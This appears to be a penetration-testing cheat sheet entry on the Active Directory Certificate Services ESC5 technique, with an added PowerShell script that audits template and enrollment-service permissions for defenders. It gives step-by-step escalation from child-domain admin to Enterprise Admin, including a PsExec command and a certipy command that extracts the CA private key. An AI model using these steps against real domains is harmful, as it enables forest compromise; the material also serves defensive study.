Active Directory - Certificate ESC5
ESC5 - Vulnerable PKI Object Access Control
Escalate from Domain Administrator in a child domain to Enterprise Administrator at the forest root by abusing weak access control on PKI objects in the Configuration naming context.
Requirements:
- Rights to add new templates to the "Certificate Templates" container
- WRITE access to the pKIEnrollmentService object
Exploitation - Access Control:
- Use PsExec to launch mmc as SYSTEM on the child DC: psexec.exe /accepteula -i -s mmc
- Connect to the "Configuration naming context" > "Certificate Templates" container
- Open certsrv.msc as SYSTEM and duplicate an existing template
- Edit the properties of the duplicated template to:
  - Grant enroll rights to a principal we control in the child domain.
  - Include Client Authentication in the Application Policies.
  - Allow SANs in certificate requests.
  - Not enable manager approval or authorized signatures.
- Publish the certificate template to the CA by adding it to the list in the certificateTemplates property of CN=Services > CN=Public Key Services > CN=Enrollment Services > pKIEnrollmentService
- Finally use the ESC1 vulnerability introduced in the duplicated template to issue a certificate impersonating an Enterprise Administrator.
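To audit the two access-control preconditions above from the defender's side, the following PowerShell is an added example (not part of the original cheat sheet): it lists every ACE, and every owner, that grants create or write rights on the Certificate Templates container or on a pKIEnrollmentService object to a principal outside an assumed allowlist of forest-root administrators. It assumes the ActiveDirectory RSAT module and read access to the Configuration naming context; the allowlist regex is an assumption to tune to the forest's own PKI administration model.

```powershell
# Added ESC5 audit example, not from the original page. Assumes the
# ActiveDirectory RSAT module (AD: PSDrive) and read access to the
# Configuration naming context from a domain-joined host.
Import-Module ActiveDirectory

$configNC = (Get-ADRootDSE).configurationNamingContext
$pkiBase  = "CN=Public Key Services,CN=Services,$configNC"

# Objects whose DACLs decide ESC5 exposure: the Certificate Templates
# container (CreateChild = add a template) and every pKIEnrollmentService
# object (WriteProperty on certificateTemplates = publish a template).
$targets  = @("CN=Certificate Templates,$pkiBase")
$targets += Get-ADObject -SearchBase "CN=Enrollment Services,$pkiBase" `
                -LDAPFilter '(objectClass=pKIEnrollmentService)' |
            Select-Object -ExpandProperty DistinguishedName

# Only forest-root administrators should hold write rights here. Child
# domain "Domain Admins" are deliberately NOT allowlisted: a child DA with
# these rights is exactly the ESC5 path to Enterprise Admin.
# Assumption: extend this list to match the forest's PKI admin model.
$rootNB   = (Get-ADDomain -Identity (Get-ADForest).RootDomain).NetBIOSName
$expected = "^(NT AUTHORITY\\SYSTEM|BUILTIN\\Administrators|$rootNB\\Enterprise Admins|$rootNB\\Domain Admins)$"

# Any of these rights lets a principal modify the object or add children.
$writeMask = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll, GenericWrite, WriteDacl, WriteOwner, WriteProperty, CreateChild'

foreach ($dn in $targets) {
    $acl = Get-Acl -Path "AD:\$dn"

    # The owner implicitly holds WriteDacl, so an unexpected owner is a finding too.
    if ($acl.Owner -notmatch $expected) {
        [pscustomobject]@{ Object = $dn; Principal = $acl.Owner; Rights = 'Owner'; Inherited = $false }
    }

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.ActiveDirectoryRights -band $writeMask) -eq 0) { continue }
        if ($ace.IdentityReference.Value -match $expected) { continue }
        [pscustomobject]@{
            Object    = $dn
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.ActiveDirectoryRights
            Inherited = $ace.IsInherited
        }
    }
}
```

Every row returned is a principal that could add or publish a template without being an Enterprise Admin; an empty result for both object types means the ESC5 preconditions listed under Requirements are not met.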
Exploitation - Golden Certificate:
- Use certipy to extract the CA certificate and private key:
certipy ca -backup -u user@domain.local -p password -dc-ip 10.10.10.10 -ca 'DOMAIN-CA' -target 10.10.10.11 -debug
- Then forge a domain admin certificate with the recovered CA key.